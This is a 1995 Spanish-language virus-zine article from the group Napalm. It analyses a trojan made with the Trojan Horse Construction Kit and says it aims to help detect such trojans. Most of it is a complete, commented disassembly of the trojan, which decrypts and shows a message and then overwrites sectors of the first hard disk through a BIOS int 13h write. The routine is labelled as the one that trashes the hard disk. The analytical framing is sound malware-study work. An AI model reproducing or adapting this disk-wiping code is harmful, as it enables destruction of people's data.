Youthanasia0:(YOUTH_00.2ND):24/11/1995 << Back To Youthanasia0


─┬────────────────────────────────────────────────────────────────────┬┐ └┼─[Trojan Horse ConstrKit/Analysis·········]─[By MALIGNITY / NAPALM]─┼─ | Archive-Date UN-KN-OWN. Original /cybworld.zip. Language Span. | ╙--------------------------------------------------------------------╓ Strings & full Dis-Assembler code para detectar los troyanos hechos con el Trojan Horse Construction Kit by VIPER/STRINGRAY Rutinas utilizadas por el troyano: --------------------------------- ; Esta es la rutina de encripcion/desencripcion ; que usa el troyano push ax push dx start: lodsb ; Cargar cadena mov ah,offset in_string ; Comienzo de los CAracteres sub al,ah or al,al jz final xchg dl,al mov ah,02 int 21h jmp start ; Bucle final: pop ax pop dx ;--------------------- ; Rutina para Escribir via int 13 ;--------------------- mov ax,035fh mov bx,data ;Variable que apunta al Buffer mov cx,0101h mov dx,0080h int 13h Estructura del Troyano: ---------------------- Comienzo jmp al codigo |---+ | | Datos o Mensage | | | Codigo <----------+ 1er Call |-----+ encrvalor | +------| 2do Call | | | | | Rutina de | | encrip/decript <-+ | Display MSG | | +----> Rutina de Destruccion O de no hacer nada Esto es todo. Desensanblado Y analizado por Malignity Credits: ------- Napalm Forces Members : * Wolf * Malignity * Dr Format * Eucaris * Candyman * AssKicker * Lucke SkyWalker * Popol * Cromos * Tanaka Y A todos los demas miembros!. --- Full Dis-Assembly --- PAGE 59,132 ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ DEMO.COM ██ ;██ ██ ;██ Created: 4-Dec-94 ██ ;██ Passes: 5 ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ ; Esta variable esta fuera del segmento del programa data_5e equ 1020h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h nic proc far start: jmp real_start ; Salto al Comienzo verdadero ; del troyano data_1 db 72h ; \Datos encriptados db 8Eh, 87h, 83h, 95h, 87h, 42h ; | db 79h, 83h, 8Bh, 96h ; | db 'PPPPPPP/,{g' ; | db 83h, 8Ah, 8Ah, 8Ah, 8Ah, 8Ah ; | db 8Ah, 8Ah, 8Ah, 8Ah, 4Eh, 4Eh ; | db 4Eh, 42h, 7Bh, 91h, 97h, 94h ; | db 42h, 6Ah, 83h, 94h, 86h, 42h ; | db 66h, 94h, 6Bh, 78h, 87h, 42h ; | db 8Bh, 95h ; | db 'BetcujgffffffQ/,"' ; / data_2 db 6Ah ; \ db 71h, 8Eh, 83h, 2Fh, 2Ch, 22h ; / Datos 2 Encriptados data_3 db 22h ;██████████████████████████████████████████████████████████████████████████ ; ; External Entry Point ; ;██████████████████████████████████████████████████████████████████████████ real_start: mov si,offset data_1 ; Apuntar SI a los datos(1) call sub_1 ; Llamada a la 1er rutina mov dl,0 call sub_2 ; Llamada a la 2da Rutina nop nop nop nop nop nop nop mov si,offset data_2 ; Apuntar SI a los Datos (2) call sub_1 ; Llamar a la 1er Rutina mov ax,4C00h int 21h ; Terminar y devolver control ; al DOS db 90h nic endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ; ; Called from: 8B52:0155, 0167 ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_1 proc near push ax push dx loc_1: ; Loop para desencriptar lodsb ; En SI-Datos pasan a AL mov ah,data_3 ; sub al,ah or al,al ; jz loc_2 ; SI es 0 saltar al final xchg dl,al mov ah,2 int 21h ; Mostrar caracter en DL ; jmp short loc_1 ; Bucle, do it loc_2: ; pop ax ; Restaurar Registros pop dx retn sub_1 endp ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ; ; Called from: 8B52:015A ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ sub_2 proc near ; Rutina que Trashea el HD mov ax,35Fh mov bx,data_5e ; Mover el buffer mov cx,101h mov dx,80h int 13h ; Disk dl=drive 0 ah=func 03h ; write sectors from mem es:bx ; al=#,ch=cyl,cl=sectr,dh=head retn sub_2 endp seg_a ends end start ; Desensamblado & analisis por Malignity. ; Soft Utilizado -> Sourcer 486